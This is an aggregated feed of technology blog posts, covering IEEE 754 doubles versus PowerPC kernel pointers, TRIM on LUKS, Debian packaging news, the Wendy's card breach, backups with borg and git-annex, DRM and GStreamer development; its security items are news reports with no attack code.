This is awkward. Signal is deservedly popular. It provides strong security without being significantly more complicated than a traditional SMS client. In my social circle there's massively more users of Signal than any other security app. If I transition to a fork of Signal, I'm no longer able to securely communicate with them unless they also install the fork. If the aim is to make secure communication ubiquitous, that's kind of a problem.

Right now the choices I have for communicating with people I know are either convenient and secure but require non-free code (Signal), convenient and free but insecure (SMS) or secure and free but horribly inconvenient (gpg). Is there really no way for us to work as a community to develop something that's all three?


Google AdsenseBlock wisely with Impression charts in the Ad review center

Today we’ve launched impression charts in the Ad review center. Impression charts provide you with insights into the frequency at which individual ad creatives are shown on your site.



Based on feedback from our publishers, we’ve replaced the previous interface with an impression chart that shows the absolute number of impressions and its distribution over time. When you’re considering blocking an ad, the impression chart can help you make a more informed decision by highlighting the potential revenue impact it may have. 

To learn more, please visit our Help Center.

We'd love to hear your feedback in the comments section below and on G+ and Twitter.
 


Posted by Liyuan Lu
Software Engineer

Planet Linux Australiasthbrx - a POWER technical blog: Doubles in hex and why Kernel addresses ~= -2

It started off a regular Wednesday morning when I heard from my desk a colleague muttering about doubles and their hex representation. "But that doesn't look right", "How do I read this as a float", and "redacted you're the engineer, you do it". My interest piqued, I headed over to his desk to enquire about the great un-solvable mystery of the double and its hex representation. The number which would consume me for the rest of the morning: 0xc00000001568fba0.

That's a Perfectly Valid hex Number!

I hear you say. And you're right, if we were to treat this as a long it would simply be 13835058055641365408 (or -4611686018068186208 if we assume a signed value). But we happen to know that this particular piece of data which we have printed is supposed to represent a double (-2 to be precise). "Well print it as a double" I hear from the back, and once again we should all know that this can be achieved rather easily by using the %f/%e/%g specifiers in our print statement. The only problem is that in kernel land (where we use printk) we are limited to printing fixed point numbers, which is why our only easy option was to print our double in its raw hex format.

This is the point where we all think back to that university course where number representations were covered in depth, and terms like 'mantissa' and 'exponent' surface in our minds. Of course as we rack our brains we realise there's no way that we're going to remember exactly how a double is represented and bring up the IEEE 754 Wikipedia page.

What is a Double?

Taking a step back for a second, a double (or a double-precision floating-point) is a number format used to represent floating-point numbers (those with a decimal component). They are made up of a sign bit, an exponent and a fraction (or mantissa):

Double format: [ sign (1 bit) | exponent (11 bits) | fraction (52 bits) ]

Where the number they represent is defined by:

value = (-1)^sign x 1.fraction x 2^(exponent - 1023)

So this means that a 1 in the MSB (sign bit) represents a negative number, and we have some decimal component (the fraction) which we multiply by some power of 2 (as determined by the exponent) to get our value.
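Concretely (a Python sketch, not from the original write-up), the three fields sit at fixed bit positions in the 64-bit word and can be pulled out with shifts and masks:

# Pull the sign, exponent and fraction fields out of a 64-bit pattern.
bits = 0xc00000001568fba0
sign = bits >> 63                  # 1 bit
exponent = (bits >> 52) & 0x7ff    # 11 bits
fraction = bits & ((1 << 52) - 1)  # 52 bits
print(sign, hex(exponent), hex(fraction))  # 1 0x400 0x1568fba0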

Alright, so what's 0xc00000001568fba0?

The reason we're all here to begin with: what's 0xc00000001568fba0 if we treat it as a double? We can first split it into the three components:

0xc00000001568fba0:

Sign bit: 1 -> Negative
Exponent: 0x400 -> 2^(1024 - 1023)
Fraction: 0x1568fba0 -> 1.something

And then use the formula above to get our number:

(-1)^1 x 1.something x 2^(1024 - 1023)

But there's a much easier way! Just write ourselves a little program in userspace (where we are capable of printing floats) and we can save ourselves most of the trouble.

#include <stdio.h>

void main(void)
{
    long val = 0xc00000001568fba0;

    printf("val: %lf\n", *((double *) &val));
}

So all we're doing is taking our hex value and storing it in a long (val), then getting a pointer to val, casting it to a double pointer, and dereferencing it and printing it as a float. Drum roll... and the answer is?

"val: -2.000000"

"Wait a minute, that doesn't quite sound right". You're right, it does seem a bit strange that this is exactly -2. Well it may be that we are not printing enough decimal places to see the full result, so update our print statement to:

printf("val: %.64lf\n", *((double *) &val));

And now we get:

"val: -2.0000001595175973534423974342644214630126953125000000"

Much better... But still where did this number come from and why wasn't it the -2 that we were expecting?

Kernel Pointers

At this point suspicions had been raised that what was being printed by my colleague was not what he expected and that this was in fact a Kernel pointer. How do you know? Let's take a step back for a second...

In the PowerPC architecture, the address space which can be seen by an application is known as the effective address space. We can take this and translate it into a virtual address which when mapped through the HPT (hash page table) gives us a real address (or the hardware memory address).

The effective address space is divided into 5 regions:

[Table: the five effective address regions]

As you may notice, Kernel addresses begin with 0xc. This has the advantage that we can map a virtual address without the need for a table by simply masking the top nibble.
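As a rough sketch of that idea (an illustration only, not the kernel's actual code), clearing the top nibble of a kernel effective address gives its offset into the linear mapping:

#include <stdio.h>
#include <stdint.h>

int main(void)
{
    uint64_t effective = 0xc00000001568fba0ULL;              /* a kernel address */
    uint64_t offset    = effective & 0x0fffffffffffffffULL;  /* mask off the 0xc nibble */

    printf("offset into the linear mapping: 0x%llx\n",
           (unsigned long long) offset);
    return 0;
}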

Thus it would be reasonable to assume that our value (0xc00000001568fba0) was indeed a pointer to a Kernel address (and further code investigation confirmed this).

But What is -2 as a Double in hex?

Well, let's modify the above program and find out:

#include <stdio.h>

int main(void)
{
        double val = -2;

        printf("val: 0x%lx\n", *((long *) &val));

        return 0;
}

Result?

"val: 0xc000000000000000"

Now that sounds much better. Let's take a closer look:

0xc000000000000000:

Sign Bit: 1 -> Negative
Exponent: 0x400 -> 2^(1024 - 1023)
Fraction: 0x0 -> Zero

So if you remember from above, we have:

(-1)^1 x 1.0 x 2^(1024 - 1023) = -2

What about -1? -3?

-1:

0xbff0000000000000:

Sign Bit: 1 -> Negative
Exponent: 0x3ff -> 2^(1023 - 1023)
Fraction: 0x0 -> Zero

(-1)^1 x 1.0 x 2^(1023 - 1023) = -1

-3:

0xc008000000000000:

Sign Bit: 1 -> Negative
Exponent: 0x400 -> 2^(1024 - 1023)
Fraction: 0x8000000000000 -> 0.5

(-1)^1 x 1.5 x 2^(1024 - 1023) = -3
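If you would rather sanity-check these by machine than by hand, a small userspace loop (again, just a sketch) prints the raw bits for a few small negative doubles:

#include <stdio.h>
#include <string.h>
#include <stdint.h>

int main(void)
{
    for (double d = -1.0; d >= -4.0; d -= 1.0) {
        uint64_t bits;

        memcpy(&bits, &d, sizeof(bits));  /* same trick as above, minus the pointer cast */
        printf("%4.1f -> 0x%016llx\n", d, (unsigned long long) bits);
    }
    return 0;
}

The output should agree with the -1, -2 and -3 values worked through above, and throws in -4 (0xc010000000000000) for free.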

So What Have We Learnt?

Firstly, make sure that what you're printing is what you think you're printing.

Secondly, if it looks like a Kernel pointer then you're probably not printing what you think you're printing.

Thirdly, all Kernel pointers ~= -2 if you treat them as a double.

And Finally, with my morning gone, I can say for certain that if we treat it as a double, 0xc00000001568fba0 = -2.0000001595175973534423974342644214630126953125.

CryptogramHacking Gesture-Based Security

Interesting research: Abdul Serwadda, Vir V. Phoha, Zibo Wang, Rajesh Kumar, and Diksha Shukla, "Robotic Robbery on the Touch Screen," ACM Transactions on Information and System Security, May 2016.

Abstract: Despite the tremendous amount of research fronting the use of touch gestures as a mechanism of continuous authentication on smart phones, very little research has been conducted to evaluate how these systems could behave if attacked by sophisticated adversaries. In this article, we present two Lego-driven robotic attacks on touch-based authentication: a population statistics-driven attack and a user-tailored attack. The population statistics-driven attack is based on patterns gleaned from a large population of users, whereas the user-tailored attack is launched based on samples stolen from the victim. Both attacks are launched by a Lego robot that is trained on how to swipe on the touch screen. Using seven verification algorithms and a large dataset of users, we show that the attacks cause the system's mean false acceptance rate (FAR) to increase by up to fivefold relative to the mean FAR seen under the standard zero-effort impostor attack. The article demonstrates the threat that robots pose to touch-based authentication and provides compelling evidence as to why the zero-effort attack should cease to be used as the benchmark for touch-based authentication systems.

News article. Slashdot thread.

Worse Than FailureCodeSOD: The Difficulties of Choice

It’s no easy task combing through the submissions and choosing the right code sample.

Ulysses knows my pain. He recently inherited a Python codebase with plenty of global variables, no convention around capitalizing identifiers, inconsistent levels of indentation, and an AngularJS front end.

He found this when investigating a bug:

candidateNum=4
if candidateNum == "4":
    handleCandidate4()
    return true
else:
    handleCandidate3()
    return true

Once upon a time, this code received candidateNum as an input, and made a decision. Sometime in the past, Ulysses’s predecessor changed it according to a ticket: “Only use the candidate4 settings”. So, he hard-coded in candidateNum = 4 and released the change.

There was only one problem with that. Python’s == operator doesn’t coerce between types: 4 != "4", and never will be. This leads us to think that perhaps the last person to touch this code knew JavaScript a little better than Python, since JavaScript has no type system to speak of and happily coerces types silently.

Ulysses removed the conditional logic.

[Advertisement] Scale your release pipelines, creating secure, reliable, reusable deployments with one click. Download and learn more today!

Planet DebianMichal Čihař: Changed Debian repository signing key

After getting complaints from apt and users, I've finally decided to upgrade the signing key on my Debian repository to something more decent than DSA. If you are using that repository, you will now have to fetch the new key to make it work again.

The old DSA key was there really because of my laziness, as I didn't want users to reimport the key, but I think it's really good that apt started to complain about it (it doesn't complain about DSA itself, but rather about using SHA1 signatures, which is the most you can get out of a DSA key).

Anyway, the new key ID is DCE7B04E7C6E3CD9 and the fingerprint is 4732 8C5E CD1A 3840 0419 1F24 DCE7 B04E 7C6E 3CD9. It's signed by my GPG key, so you can verify it this way. Of course, the instructions on my Debian repository page have been updated as well.

Filed under: Debian English

Planet DebianPetter Reinholdtsen: Debian now with ZFS on Linux included

Today, after many years of hard work from many people, ZFS for Linux finally entered Debian. The package status can be seen on the package tracker for zfs-linux and the team status page. If you want to help out, please join us. The source code is available via git on Alioth. It would also be great if you could help out with the dkms package, as it is an important piece of the puzzle to get ZFS working.

Planet Linux AustraliaChris Smart: TRIM on LVM on LUKS on SSD, revisited

A few years ago I wrote about enabling trim on an SSD that was running with LVM on top of LUKS. Since then things have changed slightly, a few times.

With Fedora 24 you no longer need to edit the /etc/crypttab file and rebuild your initramfs. Now systemd supports a kernel boot argument rd.luks.options=discard which is the only thing you should need to do to enable trim on your LUKS device.

Edit /etc/default/grub and add the rd.luks.options=discard argument to the end of GRUB_CMDLINE_LINUX, e.g.:
GRUB_TIMEOUT=5
GRUB_DISTRIBUTOR="$(sed 's, release .*$,,g' /etc/system-release)"
GRUB_DEFAULT=saved
GRUB_DISABLE_SUBMENU=true
GRUB_TERMINAL_OUTPUT="console"
GRUB_CMDLINE_LINUX="rd.luks.uuid=luks-de023401-ccec-4455-832bf-e5ac477743dc rd.luks.uuid=luks-a6d344739a-ad221-4345-6608-e45f16a8645e rhgb quiet rd.luks.options=discard"
GRUB_DISABLE_RECOVERY="true"

Next, rebuild your grub config file:
sudo grub2-mkconfig -o /boot/grub2/grub.cfg

If you’re using LVM, the setting is the same as in the previous post. Edit the /etc/lvm/lvm.conf file and enable the issue_discards option:
issue_discards = 1

If using LVM you will need to rebuild your initramfs so that the updated lvm.conf is in there.
sudo dracut -f

Reboot and try fstrim:
sudo fstrim -v /

Now also thanks to systemd, you can just enable the fstrim timer (cron) to do this automatically:
sudo systemctl enable fstrim.timer

,

CryptogramFTC Investigating Android Patching Practices

It's a known truth that most Android vulnerabilities don't get patched. It's not Google's fault. They release the patches, but the phone carriers don't push them down to their smartphone users.

Now the Federal Communications Commission and the Federal Trade Commission are investigating, sending letters to major carriers and device makers.

I think this is a good thing. This is a long-existing market failure, and a place where we need government regulation to make us all more secure.

Cory DoctorowO’Reilly Hardware Podcast on the risks to the open Web and the future of the Internet of Things

I appeared on the O’Reilly Hardware Podcast this week (MP3), talking about the way that DRM has crept into all our smart devices, which compromises privacy, security and competition.

In this episode of the Hardware podcast, we talk with writer and digital rights activist Cory Doctorow. He’s recently rejoined the Electronic Frontier Foundation to fight a World Wide Web Consortium proposal that would add DRM to the core specification for HTML. When we recorded this episode with Cory, the W3C had just overruled the EFF’s objection. The result, he says, is that “we are locking innovation out of the Web.”

“It is illegal to report security vulnerabilities in a DRM,” Doctorow says. “[DRM] is making it illegal to tell people when the devices they depend upon for their very lives are unsuited for that purpose.”

In our “Tools” segment, Doctorow tells us about tools that can be used for privacy and encryption, including the EFF surveillance self-defense kit, and Wickr, an encrypted messaging service that allows for an expiration date on shared messages and photos. “We need a tool that’s so easy your boss can use it,” he says.

Cory Doctorow on losing the open Web [O’Reilly Hardware Podcast]

LongNowNew Seminar Apps and Long Now Video Archive

The Long Now Foundation is making its video archive of the Seminars About Long-Term Thinking (SALT) freely available on its website and on the new Apple apps, allowing people to stream the SALT Seminars on Apple TV and their iOS devices.

The free iOS apps feature videos of The Long Now Foundation’s latest Seminars, including those by author and Nobel prize winner Daniel Kahneman; author Neil Gaiman; English composer and record producer Brian Eno; oceanographer Sylvia Earle; biotechnologist, biochemist and geneticist, Craig Venter; WIRED’s founding executive editor Kevin Kelly; author and MacArthur Fellow Elaine Pagels; Zappos CEO Tony Hsieh; biologist Edward O. Wilson; author and food activist Michael Pollan; and psychologist Dr. Walter Mischel, creator of The Marshmallow Test.

Long Now Seminars iOS app

The Long Now Foundation Seminars, which are hosted by Stewart Brand, are online and available in the iTunes store as a free app and audio podcast. The iOS app initially launched with 50 Seminars, with new videos added monthly as part of the Foundation’s ongoing lecture series.

The Seminars are free to watch, and are made available through the generous donations of the members and sponsors of The Long Now Foundation. Membership begins at $96 per year, and includes free tickets to the monthly Seminars held at the SFJAZZ Center in San Francisco, as well as a quarterly newsletter, free and discounted tickets to partner events amongst other member offerings. The Seminar media is created in association with Shoulder High Productions, a full circle media company and with FORA.tv, a San Francisco-based video production and marketing company.

 

Sociological ImagesBlack Lawyers Are Likely to Face Harsher Scrutiny than Their White Counterparts

At Vox, Evan Soltas discusses new research from Nextions showing racial bias in the legal profession. They put together a hypothetical lawyer’s research memo that had 22 errors of various kinds and distributed it to 60 partners in law firms who were asked to evaluate it as an example of the “writing competencies of young attorneys.” Some were told that the writer was black, others white.

Fifty-three sent back evaluations. They were on alert for mistakes, but those who believed the research memo was written by a white lawyer found fewer errors than those who thought they were reading a black lawyer’s writing. And they gave the white writer an overall higher grade on the report. (The partners’ race and gender didn’t affect the results, though women on average found more errors and gave more feedback.)

Illustration via Vox:


At Nextions, they collected typical comments:


This is just one more piece of evidence that the deck is stacked against black professionals. The old saying is that minorities and women have to work twice as hard for half the credit. This data suggests that there’s something to it.

Lisa Wade is a professor at Occidental College and the co-author of Gender: Ideas, Interactions, Institutions. Find her on Twitter, Facebook, and Instagram.

(View original at https://thesocietypages.org/socimages)

Planet Linux AustraliaLinux Users of Victoria (LUV) Announce: LUV Main June 2016 Meeting: Talks TBA

Jun 7 2016 18:30
Jun 7 2016 20:30
Location: 

6th Floor, 200 Victoria St. Carlton VIC 3053


Late arrivals, please call (0490) 049 589 for access to the venue.

Before and/or after each meeting those who are interested are welcome to join other members for dinner. We are open to suggestions for a good place to eat near our venue. Maria's on Peel Street in North Melbourne is currently the most popular place to eat after meetings.

LUV would like to acknowledge Red Hat and Infoxchange for their help in obtaining the meeting venues.

Linux Users of Victoria Inc. is an incorporated association, registration number A0040056C.


Planet Linux AustraliaLinux Users of Victoria (LUV) Announce: LUV Beginners May Meeting: Apache Cassandra Workshop

May 21 2016 12:30
May 21 2016 16:30
Location: 

Infoxchange, 33 Elizabeth St. Richmond

This hands-on workshop will provide participants with an introduction to the Cassandra distributed "NoSQL" database management system, including deployment, keyspace and table manipulation, replication, creating multiple datacenters and creating users.

Participants will:

  • Install a Cassandra server
  • Create a keyspace
  • Create a table and insert data
  • Replicate data across a three-node cluster
  • Replicate data across a two-datacenter cluster
  • Set up Cassandra and JMX authentication

The meeting will be held at Infoxchange, 33 Elizabeth St. Richmond 3121 (enter via the garage on Jonas St.)

Late arrivals, please call (0490) 049 589 for access to the venue.

LUV would like to acknowledge Infoxchange for the venue.

Linux Users of Victoria Inc. is an incorporated association, registration number A0040056C.


Planet DebianElena 'valhalla' Grandi: GnuPG Crowdfunding and sticker

GnuPG Crowdfunding and sticker

I've just received my laptop sticker from the GnuPG crowdfund http://goteo.org/project/gnupg-new-website-and-infrastructure: it is of excellent quality, but comes with HOWTO-like detailed instructions to apply it in the proper way.

This strikes me as oddly appropriate.

#gnupg

Planet DebianElena 'valhalla' Grandi: New gpg subkey

New gpg subkey

The GPG subkey http://www.trueelena.org/about/gpg.html I keep for daily use was going to expire, and this time I decided to create a new one instead of changing the expiration date.

Doing so I've found out that gnupg does not support importing just a private subkey for a key it already has (on IRC I've heard that there may be more information on it on the gpg-users mailing list), so I've written a few notes on what I had to do on my website http://www.trueelena.org/computers/howto/gpg_subkeys.html, so that I can remember them next year.

The short version is:

* Create your subkey (in the full keyring, the one with the private master key)
* export every subkey (including the expired ones, if you want to keep them available), but not the master key
* (copy the exported key from the offline computer to the online one)
* delete your private key from your regular use keyring
* import back the private keys you have exported before.

#gnupg

Krebs on SecurityWendy’s: Breach Affected 5% of Restaurants

Wendy’s said today that an investigation into a credit card breach at the nationwide fast-food chain uncovered malicious software on point-of-sale systems at fewer than 300 of the company’s 5,500 franchised stores. The company says the investigation into the breach is continuing, but that the malware has been removed from all affected locations.

“Based on the preliminary findings of the investigation and other information, the Company believes that malware, installed through the use of compromised third-party vendor credentials, affected one particular point of sale system at fewer than 300 of approximately 5,500 franchised North America Wendy’s restaurants, starting in the fall of 2015,” Wendy’s disclosed in their first quarter financial statement today. The statement continues:

“These findings also indicate that the Aloha point of sale system has not been impacted by this activity. The Aloha system is already installed at all Company-operated restaurants and in a majority of franchise-operated restaurants, with implementation throughout the North America system targeted by year-end 2016. The Company expects that it will receive a final report from its investigator in the near future.”

“The Company has worked aggressively with its investigator to identify the source of the malware and quantify the extent of the malicious cyber-attacks, and has disabled and eradicated the malware in affected restaurants. The Company continues to work through a defined process with the payment card brands, its investigator and federal law enforcement authorities to complete the investigation.”

“Based upon the investigation to date, approximately 50 franchise restaurants are suspected of experiencing, or have been found to have, unrelated cybersecurity issues. The Company and affected franchisees are working to verify and resolve these issues.”

The findings come as many banks and credit unions, feeling card fraud pain because of the breach, have been grumbling about its extent and duration. Sources at multiple financial institutions say their data indicates that some of the breached Wendy’s locations were still leaking customer card data as late as the end of March 2016 and into early April. The breach was first disclosed on this blog on January 27, 2016.

“Our ongoing investigation into unusual payment card activity at some Wendy’s restaurants is being led by a third party PFI and is proceeding as expeditiously as possible,” Wendy’s spokesman Bob Bertini said in response to questions about the duration of the breach at some stores. “As you are aware, our investigator is required to follow certain protocols in this type of comprehensive investigation and this takes time. Adding to the complexity is the fact that most Wendy’s restaurants are owned and operated by independent franchisees.”

CryptogramNew Credit Card Scam

A criminal ring was arrested in Malaysia for credit card fraud:

They would visit the online shopping websites and purchase all their items using phony credit card details while the debugging app was activated.

The app would fetch the transaction data from the bank to the online shopping website, and trick the website into believing that the transaction was approved, when in reality, it had been declined by the bank.

The syndicates would later sell the items they had purchased illegally for a much lower price.

The problem here seems to be bad systems design. Why should the user be able to spoof the merchant's verification protocol with the bank?

Worse Than FailureThe EDI Fall Back

Chris M. was a developer at Small Widget Manufacturing. He and his coworker Scott were, in theory, assigned only to developing their in-house ERP software. However, with just one person running the company’s help desk, they often picked up anything considered “software-related.”

A ticket pinged Chris’s inbox: EDI Running Slow. It was from a sales rep named Brett, and like most tickets from sales reps, was marked Urgent. Chris decided to play ball, since Scott was tied up with something else. He called Brett, asking if he could elaborate.

Calendar by Johannes von Gmunden, 15th century

“Normally, when I get an order from a customer,” Brett said, “I can just go into our ERP system and upload it, and it’ll get imported in fifteen minutes. If I get an error, I wait fifteen minutes and try again. That used to work, but now it’s taking longer than 45 minutes for it to upload.”

“It’s probably just a scheduler that’s misconfigured,” Chris said. “I’ll look into it.”

Reappropriated Hardware

Small Widget Manufacturing used a custom-built EDI solution for transferring orders, blueprints, etc. between their customers and the plant. The whole thing had been delivered by some expensive third-party consultants just before Chris had started at Small Widget, after which the consultants vanished without a trace. They hadn’t even left behind documentation for the EDI software.

Chris hadn’t yet dug into the guts of the EDI software, so he asked Scott where it was housed. “Dunno,” he replied. “Check with IT.”

Fine. So Chris went to IT, talking to Cori, who headed that department. After half an hour of digging through paperwork, she led Chris to a desktop box in a corner, covered in dust. On its case was a badge: Windows 7 Home, it said.

“EDI runs on that?”

Cori nodded. “The consultants didn’t want to put it on some new hardware, so they dug this out of storage and installed their software on it. They didn’t even bother to reformat it.”

A Time-Saving Feature

Back at his desk, Chris was able to remote desktop onto the Win7 machine and began digging around. He checked the hard drive first, noticing that there was very little space left. The default Windows task scheduler was terrible, so anything usable must be custom-built. He noticed an application running in the taskbar with a clock icon. He clicked on it, spawning a console window.

The highly-paid consultant’s EDI solution was little more than a long-running FTP app. Thinking that the app must be choking the disk with logs, Chris dug through the hard drive and found them.

[12] Sun 01Nov15 03:24:04 - (Task: SPS FTP) - Next scheduled execution on Sunday, November 01, 2015 04:39:00

That looked wrong. Brett said that his file transfers happened within 15 minutes. Why would the next task be scheduled for an hour and fifteen minutes in the future? Digging further back into the logs, he found this:

[12] Sat 31Oct15 23:39:02 - (Task: SPS FTP) - Next scheduled execution on Saturday, October 31, 2015 23:54:00

It was scheduling tasks correctly on October 31st, but not November 1st. So what happened on that date to cause the scheduler to bump up the interval by an hour? Frustrated, Chris stepped over to Scott’s desk to bounce some ideas off of him. He asked what could possibly have happened on November 1st.

“I dunno,” Scott said. “Daylight saving time?”

As Scott said it, both he and Chris knew that was exactly what was wrong with the machine. It was running off its own scheduler, not Windows, so whatever solution the highly-paid consultants had given Small Widget, it didn’t account for the end of daylight saving time.

Future-Proofing

After some further digging, Chris discovered a setting: the app used “09–01–2015” as a start date for its scheduling timer. He changed this to “11–02–2015”, a day after the end of daylight saving time. He restarted the app in task manager, waited half an hour, and checked the logs.

It was once again running every 15 minutes.

He called Brett with the news, who was just happy that his file transfers didn’t take over an hour to complete. Chris also added an item to his calendar: at the beginning of daylight saving time next year, he would change the date setting again. He didn’t want to know what would happen if the scheduled task were set to run every –45 minutes.
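The underlying lesson for anyone writing their own scheduler: compute run times from an epoch-based (UTC) anchor rather than from local wall-clock time, and daylight saving transitions can never shift the interval. A minimal sketch of the idea (my illustration, not the consultants’ code; the anchor value simply mirrors the story’s 09–01–2015 start date):

#include <stdio.h>
#include <time.h>

int main(void)
{
    const time_t start    = 1441065600;  /* 2015-09-01 00:00 UTC, a hypothetical anchor */
    const time_t interval = 15 * 60;     /* 15 minutes */

    time_t now  = time(NULL);
    time_t next = start + ((now - start) / interval + 1) * interval;

    printf("next run: %s", ctime(&next));
    return 0;
}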

[Advertisement] Infrastructure as Code built from the start with first-class Windows functionality and an intuitive, visual user interface. Download Otter today!

Planet DebianSylvain Le Gall: Release of OASIS 0.4.6

I am happy to announce the release of OASIS v0.4.6.

Logo OASIS small

OASIS is a tool to help OCaml developers to integrate configure, build and install systems in their projects. It should help to create standard entry points in the source code build system, allowing external tools to analyse projects easily.

This tool is freely inspired by Cabal which is the same kind of tool for Haskell.

You can find the new release here and the changelog here. More information about OASIS in general on the OASIS website.

The main purpose of this release is to make it possible to install OASIS with OPAM on OCaml 4.03.0. In order to do so, I had to disable some tests and use a new set of String.*_ascii functions. The OPAM release is pending upload and should soon be available.

Planet DebianJulian Andres Klode: Backing up with borg and git-annex

I recently found out that I have access to a 1 TB cloud storage drive by 1&1, so I decided to start taking off-site backups of my $HOME (well, backups at all, previously I only mirrored the latest version from my SSD to an HDD).

I initially tried obnam. Obnam seems like a good tool, but is insanely slow. Unencrypted it can write about 3 MB/s, which is somewhat OK, but even then it can spend hours forgetting generations (1 generation takes probably 2 minutes, and there might be 22 of them). In encrypted mode, the speed reduces a lot, to about 500 KB/s if I recall correctly, which is just unusable.

I found borg backup, a fork of attic. Borg backup achieves speeds of up to 15 MB/s which is really nice. It’s also faster with scanning: I can now run my bihourly backups in about 1 min 30s (usually backs up about 30 to 80 MB – mostly thanks to Chrome I suppose!). And all those speeds are with encryption turned on.

Both borg and obnam use some form of chunks from which they compose files. Obnam stores each chunk in its own file, borg stores multiple chunks (even from different files) in a single pack file which is probably the main reason it is faster.

So how am I backing up: My laptop has an internal SSD and an HDD.  I backup every 2 hours (at 09,11,13,15,17,19,21,23,01:00 hours) using a systemd timer event, from the SSD to the HDD. The backup includes all of $HOME except for Downloads, .cache, the trash, Android SDK, and the eclipse and IntelliJ IDEA IDEs.

Now the magic comes in: The backup repository on the HDD is monitored by git-annex assistant, which automatically encrypts and uploads any new files in there to my 1&1 WebDAV drive and registers them in a git repository hosted on bitbucket. All files are encrypted and checksummed using SHA256, reducing the chance of the backup being corrupted.

I’m not sure how the WebDAV thing will work once I want to prune things, I suspect it will then delete some pack files and repack things into new files which means it will spend more bandwidth than obnam would. I’d also have to convince git-annex to actually drop anything from the WebDAV remote, but that is not really that much of a concern with 1TB storage space in the next 2 years at least…

I also have an external encrypted HDD which I can take backups on, it currently houses a fuller backup of $HOME that also includes Downloads, the Android SDK, and the IDEs for quicker recovery. Downloads changes a lot, and all of them can be fairly easily re-retrieved from the internet as needed, so there’s not much point in painfully uploading them to a WebDAV backup site.

 


Filed under: Uncategorized

Planet DebianNorbert Preining: Gaming: The Room series

After having finished Monument Valley and some spin-offs, Google Play suggested The Room series of games to me (The Room, The Room II, Room III), classic puzzle games with a common theme – one needs to escape from some confinement.


I have finished all three games; game play was very nice and smooth on my phone (Nexus 6P). The graphics and level of detail are often astonishing, and everything is well made.

But there is one drop of Vermouth: you need a strong finger-tapping muscle! I really love solving the puzzles, but most of them were not really difficult. The real difficulty is finding everything by touching each and every knob, looking from all angles at all times. This latter part, the tedious business of finding things by tapping on often illogical places until you realize “ahh, there is something that turns”, is what I do not like.

I had the feeling that more than 60% of the game play is searching for things. Once you have found them, their use and the actual riddle is mostly straightforward, though.

The Room series somehow reminded me of the Myst series (Myst, Riven, Myst III etc), but as far as I recall the Myst series had more involved, more complicated riddles, and less searching. Also the recently reviewed Talos Principle and Portal series have clearly set problems that challenge your brain, not your finger-tapping muscle.

But all in all a very enjoyable series of games.

Final remark: I learned recently that there are real-world games like this, called “Escape Room“. Somehow tempting to try one out …

Planet Linux AustraliaJan Schmidt: Towards GStreamer 1.0 talk

 GStreamer logo

I gave my talk titled “Towards GStreamer 1.0” at the Gran Canaria Desktop Summit on Sunday. The slides are available here.

My intention with the talk was to present some of the history and development of the GStreamer project as a means to look at where we might go next. I talked briefly about the origins of the project, its growth, and some of my personal highlights from the work we’ve done in the last year. To prepare the talk, I extracted some simple statistics from our commit history. In those, it’s easy to see both the general growth of the project, in terms of development energy/speed, as well as the increase in the number of contributors. It’s also possible to see the large hike in productivity that switching to Git in January has provided us.

The second part of the talk was discussing some of the pros and cons around considering whether to embark on a new major GStreamer release cycle leading up to a 1.0 release. We’ve successfully maintained the 0.10 GStreamer release series with backwards-compatible ABI and API (with some minor glitches) for 3.5 years now, and been very successful at adding features and improving the framework while doing so.

After 3.5 years of stable development, it’s clear to me that when we made GStreamer 0.10, it really ought to have been 1.0. Nevertheless, there are some parts of GStreamer 0.10 that we’re collectively not entirely happy with and would like to fix, but can’t without breaking backwards compatibility – so I think that even if we had made 0.10 at that point, I’d want to be doing 1.2 by now.

Some examples of things that are hard to do in 0.10:

  • Replace ugly or hard to use API
  • ABI mistakes such as structure members that should be private having been accidentally exposed in some release.
  • Running out of padding members in public structures, preventing further expansion
  • Deprecated API (and associated dead code paths) we’d like to remove

There are also some enhancements that fall into a more marginal category, in that they are technically possible to achieve in incremental steps during the 0.10 cycle, but are made more difficult by the need to preserve backwards compatibility. These include things like adding per-buffer metadata to buffers (for extensible timestamping/timecode information, pan & scan regions and others), variable strides in video buffers and creating/using more base classes for common element types.

In the cons category are considerations like the obvious migration pain that breaking ABI will cause our applications, and the opportunity cost of starting a new development cycle. The migration cost is mitigated somewhat by the ability to have parallel installations of GStreamer. GStreamer 0.10 applications will be able to coexist with GStreamer 1.0 applications.

The opportunity cost is a bit harder to ignore. When making the 0.9 development series, we found that the existing 0.8 branch became essentially unmaintained for 1.5 years, which is a phenomenon we’d all like to avoid with a new release series. I think that’s possible to achieve this time around, because I expect a much smaller scope of change between 0.10 and 1.0. Apart from the few exceptions above, GStreamer 0.10 has turned out really well, and has become a great framework being used in all sorts of exciting ways that doesn’t need large changes.

Weighing up the pros and cons, it’s my opinion that it’s worth making GStreamer 1.0. With that in mind, I made the following proposal at the end of my talk:

  • We should create a shared Git playground and invite people to use it for experimental API/ABI branches
  • Merge from the 0.10 master regularly into the playground regularly, and rebase/fix experimental branches
  • Keep developing most things in 0.10, relying on the regular merges to get them into the playground
  • After accumulating enough interesting features, pull the experimental branches together as a 0.11 branch and make some releases
  • Target GStreamer 1.0 to come out in time for GNOME 3.0 in March 2010

This approach wasn’t really possible the last time around when everything was stored in CVS – it’s having a fast revision control system with easy merging and branch management that will allow it.

GStreamer Summit

On Thursday, we’re having a GStreamer summit in one of the rooms at the university. We’ll be discussing my proposal above, as well as talking about some of the problems people have with 0.10, and what they’d like to see in 1.0. If we can, I’d like to draw up a list of features and changes that define GStreamer 1.0 that we can start working towards.

Please come along if you’d like to help us push GStreamer forward to the next level. You’ll need to turn up at the university GCDS venue and then figure out on your own which room we’re in. We’ve been told there is one organised, but not where – so we’ll all be in the same boat.

The summit starts at 11am.

Planet Linux AustraliaJan Schmidt: New York trip, DVD stuff

We’re leaving tomorrow afternoon for 11 days holiday in New York and Washington D.C. While we’re there, I’m hoping to catch up with Luis and Krissa and Thom May. It’s our first trip to either city, so we’re really excited – there’s a lot of fun, unique stuff to do in both places and we’re looking forward to trying to do all of it in our short visit.

On the GStreamer front, I just pushed a bunch of commits I’ve been working on for the past few weeks upstream into Totem, gst-plugins-base and gst-plugins-bad. Between them they fix a few DVD issues like multiangle support and playback in playbin2. The biggest visible feature though is the API that allowed me to (finally!) hook up the DVD menu items in Totem’s UI. Now the various ‘DVD menu’, ‘Title Menu’ etc menu items work, as well as switching angles in multiangle titles, and it provides the nice little ‘cursor switches to a hand when over a clickable button’ behaviour.

I actually had it all ready yesterday, but people told me April 1 was the wrong day to announce any big improvements in totem-gstreamer DVD support :-)

Planet Linux AustraliaJan Schmidt: A glimpse of audio nirvana

